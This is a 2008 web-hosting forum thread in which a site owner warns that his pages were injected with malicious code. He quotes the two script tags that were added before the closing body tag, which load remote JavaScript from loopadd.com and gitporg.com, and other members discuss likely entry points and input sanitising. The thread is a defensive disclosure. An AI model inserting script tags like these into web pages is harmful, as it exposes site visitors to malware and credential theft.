[advanced search]
Results from the most recent live auction are here.
12 members in the live chat room. Join Chat!
Register Rules & FAQ NP$ Store Active Threads Mark Forums Read
Go Back   NamePros.Com > Community > Warnings & Alerts
User Name
Password

Old 07-16-2008, 04:52 PM   · #1
raydar
New Member
 
Trader Rating: (0)
Join Date: Feb 2008
Posts: 18
NP$: 0.00 (Donate)
raydar is an unknown quantity at this point
Websites being hacked

I'm not sure if this is the best place to put this, but I just wanted to give a heads up on a new (or old?) bug that's going around. I just got an email from Google Search Quality informing me that "We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com. "

I went to my pages, and lo and behold, there are two pieces of script that were inserted onto EVERY .html and .php file, right before the </body> tag.

I'm posting the hacked code here, so you can see the file and the format *PLEASE DO NOT CLICK* <script src=http://www.loopadd.com/fgg.js></script><script src=http://www.gitporg.com/fgg.js></script>

After some research, it looks like a lot of these scripts attempt to install keylogging software to try and steal your info. It also seems like they get in through forms where you can upload things and SQL databases.

I have no idea how it was able go infect my site since my only form is a basic email contact form and I don't have SQL database (if anyone has any ideas, I'd love to hear them.) I contacted the hosting company and was told that they haven't had any problems on their side.

Fortunately I have a clean version of my website on my local computer, so the hosting company thinks that uploading the new version will make the problem go away. Keeping my fingers crossed that this will work and I can get Google to unflag me.

Just please be aware that this hack is being spread & be careful.


Please register or log-in into NamePros to hide ads
__________________
www.creativepatience.com
raydar is offline   Reply With Quote
Old 07-16-2008, 05:00 PM   · #2
nasaboy007
NamePros Regular
 
Location: mysitememberships.com
Trader Rating: (32)
Join Date: Jul 2005
Posts: 863
NP$: 4144.90 (Donate)
nasaboy007 is a splendid one to beholdnasaboy007 is a splendid one to beholdnasaboy007 is a splendid one to beholdnasaboy007 is a splendid one to beholdnasaboy007 is a splendid one to beholdnasaboy007 is a splendid one to beholdnasaboy007 is a splendid one to behold
a headsup is always appreciated.

i dont know how they could edit your files like that without actual access to the files (meaning potentially compromised ftp/etc). im not sure but cross-site-scripting MIGHT fall under these categories but im not sure if XSS will keep the code permanently in the hacked page (if that's even possible).

do you sanitize the input that you have for the contact form? (strip_tags, addslashes, etc)
__________________
nasaboy007 is online now   Reply With Quote
Old 07-16-2008, 05:17 PM   · #3
raydar
New Member
 
Trader Rating: (0)
Join Date: Feb 2008
Posts: 18
NP$: 0.00 (Donate)
raydar is an unknown quantity at this point
I did change my .ftp password right away.

I'm not sure about sanitizing the contact form - I got the template from chfeedback.php (since this sort of code isn't really my forte). Do you know what code I should be adding to make sure nothing fishy is getting through it? I do see an
"if (get_magic_quotes_gpc()) {
$comments = stripslashes( $comments );
}" in the .php file.

Thanks.
__________________
www.creativepatience.com
raydar is offline   Reply With Quote
Old 07-16-2008, 05:21 PM   · #4
coreyg
Senior Member
 
coreyg's Avatar
 
Name: Corey
Location: Sydney, Australia
Trader Rating: (49)
Join Date: Mar 2008
Posts: 1,931
NP$: 407.22 (Donate)
coreyg has much to be proud ofcoreyg has much to be proud ofcoreyg has much to be proud ofcoreyg has much to be proud ofcoreyg has much to be proud ofcoreyg has much to be proud ofcoreyg has much to be proud ofcoreyg has much to be proud ofcoreyg has much to be proud ofcoreyg has much to be proud of
contact http://www.igosh.org/

Cheers
Corey
coreyg is offline   Reply With Quote
Reply

NamePros is a revenue sharing forum.

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


Site Sponsors
Click to Watch Instant Video YUPPADS YUPPADS
Advertise your business at NamePros
All times are GMT -7. The time now is 09:37 AM.


Powered by: vBulletin Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 2.4.0